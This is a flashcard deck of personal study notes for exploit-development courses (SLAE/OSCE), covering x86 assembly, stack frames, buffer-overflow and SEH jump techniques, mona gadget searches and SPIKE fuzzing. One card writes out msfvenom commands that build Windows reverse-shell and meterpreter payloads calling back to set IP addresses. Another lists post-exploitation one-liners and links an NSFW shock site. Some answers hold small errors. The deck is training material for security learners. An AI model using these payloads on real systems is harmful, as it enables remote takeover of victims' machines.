Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

OSCE - Extra ASM > SLAE - Extras > Flashcards

SLAE - Extras Flashcards

Opcodes and ASM commands

1
Q

Accessing memory reference with []

A
  • message db 0xAA, 0xBB, 0xCC, 0xDD <== makes variable message
  • mov eax, message <== moves address of message into eax
  • mov eax, [message] <== moves value of message into eax
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

declaring uninitialized data -
What is resb
What is resw

A

buffer: resb 64 ; reserve 64 bytes
wordvar: resw 1 ; reserve a word

Uninitialized data is placed in the bss segment

Check NASM manual pg. 30

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Special tokens -

  • What is $
  • What is $$
A

$ - evaluates to the current line
$$ - evaluates to the beginning of the current section

These are used at times to figure out the offset of the current instruction from something else (often)

for example

message: db ‘hello world!’
msglen: equ $-message

So how this works is $ signifies a reference to the beginning of the second line before msglen while message signifies the beginning of the ‘hello world!’ string, so $ - message = ‘len of ‘h-!’

Or jmp $ would create an infinite loop that keep jumping back to the beginning of the section

This is a bit confusing check SLAE module 10 5:57

Check NASM manual pg. 37

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

TIMES
what does the following lines of code do

(i)
zerobuf: times 64 db 0

(ii)
times 100 movsb

A

(i)
zerobuf: times 64 db 0

repeats ‘declare byte 0’ 64 times

(ii)
times 100 movsb

instruction where movsb is to be repeated 100 times

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is Little Endian

A

The lower byte gets stored in lower memory and the higher byte gets stored in higher memory

https: //upload.wikimedia.org/wikipedia/commons/thumb/e/ed/Little-Endian.svg/200px-Little-Endian.svg.png
https: //en.wikipedia.org/wiki/File:Big-Endian.svg

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

LEA:

1) What does it stand for
2) What does it do
3) Syntax of LEA
4) What is its opcode

A 
1) 
LEA stands for 'Load Effective Address'
2) 
It loads a pointer values for example into a register
3) 
if the variable 'label' is at 0x8049254

LEA EAX, [label]
will make the value of EAX 0x8049254

4)
8D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

XCHG:

1) What does it stand for
2) What does it do
3) Syntax of XCHG
4) What is its opcode

A

1)
Exchange

2)
It swaps values for example in registers

3)
XCHG Register, Register
(swaps values of two registers)

XCHG Register, Memory
(Swaps values of register and memory address)

4) Going to skip for minute due to different registers but makes to come back to

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is MOV

What are its allowed directions

A

MOV - Responsible for moving register memory and data in the following ways

  • Allowed directions
  • Between registers
  • Memory to register and register to memory
  • Immediate data to register
  • Immediate data to memory
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

r/m16 and r/m32 means…

A

it means it could be taking a value either from a register, or a memory

For example in x86 you can only push and pop r/m16 and r/m32 values on the stack

ie 16 bit and 32 bit

r/m16
push ax
pop bx

r/m32
push eax
pop ecx

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What instructions does LEAVE do

A

LEAVE is equivalent to :
MOV ESP, EBP
POP EBP.

Functions will often start with
PUSH EBP
MOV EBP, ESP

So LEAVE returns things to the state they were in when we initiated the function

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

When using EBP as a base pointer for a function, what will the offsets from EBP be for

  • the return address
  • the first parameter
  • the first local variable

Represent it as EBP+(number)

A 
* the return address:
EBP+4
* the first parameter:
EBP+8
* the first local variable:
EBP-4

By using a base pointer the return address will always be at ebp+4, the first parameter will always be at ebp+8, and the first local variable will always be at ebp-4. Even as the stack size grows and shrinks those offsets do not change. This also makes it easier for disassemblers because it’s easy to track the parameters and local variables being access throughout the function because their addresses never change.

For example:
0022FEC4 00404016 ASCII “Function 1”
0022FEC8 /0022FEF8 Frame Pointer EBP
0022FECC |00401596 Return Address in main()
0022FED0 |11111111 Argument to function 1

See:
https://practicalmalwareanalysis.com/2012/04/03/all-about-ebp/

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What does RETN do

A

POP EIP???

The stack will onwound by the functions conclusion
LEAVE is equivalent to :
MOV ESP, EBP
POP EBP.

That means the stack should now point to the address just after it was called.

so the
POP EIP

will bring us to the place in program after the function was called and flow will continue

RET pops top of stack into EIP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

CMP

TEST

JE [Jump if Equals]

A

CMP subtracts the operands and sets the flags. Namely, it sets the zero flag if the difference is zero (operands are equal).

TEST sets the zero flag, ZF, when the result of the AND operation is zero. If two operands are equal, their bitwise AND is zero when both are zero. TEST also sets the sign flag, SF, when the most significant bit is set in the result, and the parity flag, PF, when the number of set bits is even.

See here for excellent explanation:
https://reverseengineering.stackexchange.com/a/15185

JE [Jump if Equals] tests the zero flag and jumps if the flag is set. JE is an alias of JZ [Jump if Zero] so the disassembler cannot select one based on the opcode. JE is named such because the zero flag is set if the arguments to CMP are equal.

So,

TEST %eax, %eax
JE 400e77

jumps if the %eax is zero.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

How do you easily get the shellcode into assembly instructions. What command on Kali

A

pipe it into:
| ndisam -u -

For example:
$msfvenom windows -p windows/shell_bind_tcp -f c | ndisasm -u - -p intel

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A way to find your shellcode using the hex dump in Immunity

A
  • Copy a part of it into clipboard, lets say:
    \xfc\xe8\x82\x00
  • Right click on the Hex Dump window and select:
    Search for > Binary string
    (or ctrl + b)
  • This will get you the address
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Metasploit pattern create usage

A

Location:
cd /usr/share/metasploit-framework/tools/exploit/

Usage:
/pattern_create.rb -l 2000

Then find pattern offset

Say EIP is 69423569

/pattern_offset.rb -q 69423569

17
Q

msf venom usage basic

A

msfvenom -p windows/shell_bind_tcp -f c -a x86

  • f c = language c (try python)
  • a = architecture x86

a good alphanu,meric reverse shell though watch out for first chars
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.98.73 LPORT=443 -a x86 -e x86/alpha_mixed -b “\x00\x09\x0a\x0d\x2e\xff” -f python

meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.65 -f python -a x86

use exploit/multi/handler 
# msf meterpreter handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your ip address]
exploit

#####

stable raw reverse shell

msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp lhost=192.168.98.73 lport=443 EXITFUNC=thread -f python
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of python file: 1556 bytes

####
Calc for prototyping

msfvenom -a x86 —platform windows -p windows/exec cmd=calc.exe -b ”\x00\x0a\x0d” -f python

####
Really small (107 bytes) add admin shellcode - Needs to be compiled
https://www.exploit-db.com/exploits/15202

MSG code 113 bytes
https://www.exploit-db.com/exploits/28996

18
Q

post exploit cmd prompt fun

Remember these one liners

A

pop calc - the classic
calc.exe

####################
open webbrowser

start iexplore www.lemonparty.org
start firefox www.lemonparty.org

[note sites above very NSFW]
############
One liner to launch a command prompt message box

mshta “javascript:var sh=new ActiveXObject( ‘WScript.Shell’ ); sh.Popup( ‘Message!’, 0, ‘Title!’, 64 );close()”

or simple but not as good
mshta “javascript:alert(‘Message!’);”

See proper docs here
https://stackoverflow.com/a/21165566

##############
speech
mshta    vbscript:Execute("CreateObject(""SAPI.SpVoice"").Speak(""Hello"")(window.close)")

map files
dir /s /b>filelist.txt

tree /f

19
Q

an interrupt in hex and what it is for

A

\xcc

or INT3

It will create a breakpoint.

Sometimes good for observing shellcode in debugger but be careful it can break things

20
Q

Mona and bad chars

A

!mona bytearray
- Produces bytearray

Example code-stub to read byte array from python:

buffer += open(“/root/Desktop/Exploit Dev Shared/MonaIO/mona_patternminishare/bytearray.bin”, “rb”).read()

Compares byte array with memory address -
First param is address of byte array, 2nd is memory address where byte array should start

!mona compare -f F:\mona_patternminishare/bytearray.bin -a 013b3908

So then say we see \x00 is a bad char we then generate another byte array and exclude it

!mona bytearray -cpb ‘\x00’

NOTE cpb NOT cpd - YOU ALWAYS WRITE CPD DON’T DO IT

21
Q

Mona find jmps

A

!mona jmp -r esp -n

jmp = look for jmps
-r esp = register esp
-n = don’t show pointers that have null bytes
( = cpb ‘\x00’)

-m kernel32.dll
only search in this module

precise instruction
!mona find -type instr -s “call ebx”

22
Q

Methods of JMP’ing 1

  • jump (or call)
  • pop return
  • push return
A

From:
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

jump (or call)
a register that points to the shellcode. With this technique, you basically use a register that contains the address where the shellcode resides and put that address in EIP. You try to find the opcode of a “jump” or “call” to that register in one of the dll’s that is loaded when the application runs. When crafting your payload, instead of overwriting EIP with an address in memory, you need to overwrite EIP with the address of the “jump to the register”.� Of course, this only works if one of the available registers contains an address that points to the shellcode. This is how we managed to get our exploit to work in part 1, so I’m not going to discuss this technique in this post anymore.

pop return :
If none of the registers point directly to the shellcode, but you can see an address on the stack (first, second, … address on the stack) that points to the shellcode, then you can load that value into EIP by first putting a pointer to pop ret, or pop pop ret, or pop pop pop ret (all depending on the location of where the address is found on the stack) into EIP.

push return :
this method is only slightly different than the “call register” technique.� If you cannot find a or opcode anywhere, you could simply put the address on the stack and then do a ret.� So you basically try to find a push , followed by a ret.� Find the opcode for this sequence, find an address that performs this sequence, and overwrite EIP with this address.

23
Q

Methods of JMP’ing 2

  • jmp [reg + offset]
  • blind return
  • JMP code
  • SEH
A

From:
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

jmp [reg + offset] :
If there is a� register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or application dll’s, which will add the required bytes to the register and then jumps to the register. I’ll refer to this method as jmp [reg]+[offset]

blind return :
in my previous post I have explained that ESP points to the current stack position (by definition).� A RET instruction will ‘pop’ the last value (4bytes) from the stack and will put that address in ESP. So if you overwrite EIP with the address that will perform a RET instruction, you will load the value stored at ESP into EIP.

JMP code
If you are faced with the fact that the available space in the buffer (after the EIP overwrite) is limited, but you have plenty of space before overwriting EIP, then you could use jump code in the smaller buffer to jump to the main shellcode in the first part of the buffer.

SEH :
Every application has a default exception handler which is provided for by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanation before you can start abusing the SEH to write exploits.� The idea behind this is that if you build an exploit that does not work on a given OS, then the payload might just crash the application (and trigger an exception). So if you can combine a “regular” exploit with a seh based exploit, then you have build a more reliable exploit. Anyways, the next part of the exploit writing tutorial series (part 3) will deal with SEH.�� Just remember that a typical stack based overflow, where you overwrite EIP, could potentionally be subject to a SEH based exploit technique as well, giving you more stability, a larger buffer size (and overwriting EIP would trigger SEH… so it’s a win win)

24
Q

POP opcodes

A 
pop eax 	58
pop ebx 	5b
pop ecx 	59
pop edx 	5a
pop esi 	5e
pop ebp 	5d
25
Q

More Jmps - JMPS 3

A

Custom Jumpcode:

Popad:

Short jumps and conditional jumps:
(Short JMPs are 127 bytes [7Fh] forwards or back)
(really good chart in Corelan tutorial below)
See also:
http://thestarman.narod.ru/asm/2bytejumps.htm

See:
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

26
Q

SHORT JUMPS

A

Short JMPs are 127 bytes [7Fh] forwards or back

. The first byte of a SHORT Jump is always EB
and the second is a relative offset from 00h to 7Fh for Forward jumps,
and from 80h to FFh for Reverse (or Backward) j

[Note: The offset count always begins at the byte immediately after the JMP instruction for any type of Relative Jump!]

So if we are at address 100h

  • an instruction of EB 00 will get us to 102h
  • an instruction of EB 01 will get us to 103h

Negative jumps:
These descend. So the highest hex value FFh is the shortest JMP (-1) and 80h is the longest -128.

In reality since it needs to count down through itself the first 3 jmps don’t act as you would expect.

if we start at 200h
EB FF   - 201 (ascends!)
EB FE - 200 (endless loop!)
EB FD - 1FF ( - 1)
EB FC - 1FE (-2)

EB 83 ( -122)

Simple rules is take away 3 from value for bytes you will move

So
EB 7D will be negative 123 bytes
EB 7F will be negative 125 bytes

Many conditional short jumps as well in Corelan
(really good chart in Corelan tutorial below)

See:
http://thestarman.narod.ru/asm/2bytejumps.htm

27
Q

Common Bad Chars.

If the buffer is getting mysteriously warped start with these

A 
00 for NULL
    09
    0A for Line Feed \n
    0D for Carriage Return \r
    FF for Form Feed \f
28
Q

More common pop pop rets

A

pop edi, pop esi, pop ebx, ret

popad, ret (equivalent to x 8 pops dwords or 32 bytes)
does in this order:
POP EDI, POP ESI, POP EBP, POP ESP, POP EDX, POP ECX, POP EAX (with ESP being discarded??? don’t get that)

can also be put in shell as jumpcode. See:
http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/

\x61 # popad
\xff\xe4 # JMP esp

29
Q

excellent resource on jumps

A

https://www.abatchy.com/2017/05/jumping-to-shellcode.html

30
Q

Spike Usage

A

Generic usage:
generic_send_tcp - works from terminal in Kali

generic_send_tcp host port spike_script SKIPVAR SKIPSTR
arg 1, 2 and 3 = host, port, scripts

SKIPVAR and SKIPSTR, essentially allow you to jump into the middle of the fuzzing session defined by a SPIKE script.

For example, if you include three “s_string_variables” in your SPIKE script, and you want to ignore the first two variables and only fuzz the third, you would set SKIPVAR to 2 (the numbering of the variables starts counting upwards from 0, so the third variable is referred to by the number 2).

Each of the “s_string_variables” also has an array of different fuzz string values inbuilt into SPIKE that it will iterate through within a SPIKE fuzzing session. If you want to skip the first 10 of these strings, and start fuzzing at string 11, you can set SKIPSTR to 10 (again, counting starts from 0).

https://resources.infosecinstitute.com/intro-to-fuzzing/

31
Q

Installation instructions for adapted spike -

One that quits after bad requests on network

A

sudo apt-get install build-essential

cd ~
mkdir arsenal
cd arsenal
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xzvf SPIKE2.9.tgz
cd SPIKE/src
./configure
make

Before you actually compile SPIKE, I recommend making a small change to the source first. Edit the file spike.c in SPIKE/SPIKE/src from the source tarball, and find the two “return 0;” strings that immediately follow the lines “printf(“tried to send to a closed socket!\n”);”. Replace these two “return 0;” lines with “exit(1);”. This change will essentially cause SPIKE to exit with a non zero return code when it tries to send data to a closed socket – this becomes useful when we run SPIKE from a wrapper script later on in this article. Once this change is made you can compile SPIKE using the normal “./configure; make” commands run from the src directory.

https://resources.infosecinstitute.com/intro-to-fuzzing/

32
Q

Wireshark and spike

A

Set up wireshark to be capturing packets

  • Use this
    host 192.168.56.101 and tcp port 9999

Once it crashes
Track down the variable that caused the crash as mentioned in this article. You are looking for the last ‘Welcome’ without a response

33
Q

Peach 3 tutorials

A

https: //resources.infosecinstitute.com/fuzzing-vulnserver-with-peach-part-2/
https: //resources.infosecinstitute.com/fuzzing-vulnserver-with-sulley-part-3/

that ^^^ for peach 2 so consult these

http: //www.rockfishsec.com/2014/01/fuzzing-vulnserver-with-peach-3.html
http: //sh3llc0d3r.com/fuzzing-vulnserver-with-peach/#
https: //www.youtube.com/watch?v=j05KaAcjZec

34
Q

SEH based exploits errata

A

When exception is triggered the address of Next SEH is loaded into ESP + 8
(stablisherFrame/_EXCEPTION_REGISTRATION_RECORD )

Hence why we want the pop pop ret.

A bit of a refresher on how ret works here:

RETN = Pop the address on the top of the stack, then return to that address. ie. EIP is top of the stack

or RETN = POP EIP

https://www.cavestory.org/guides/csasm/guide/call_retn.html

So

  • SEH overwritten to an address that is a pop pop ret
  • This makes EIP Next SEH
  • Next SEH will have to contain some sort of jump to our shellcode
35
Q

More mona

A 
Finding JMP ESP in module with MONA
In Immunity, at the bottom, execute this command in the white bar.
!mona find -s "\xff\xe4" -m essfunc.dll

This searches the essfunc.dll module for the bytes FFE4.

The hexadecimal code for a “JMP ESP” instruction is FFE4.

The hexadecimal code for the two-instruction sequence “POP ESP; RET” is 5CC3.

can find with nasm_shell.rb

OSCE - Extra ASM (2 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions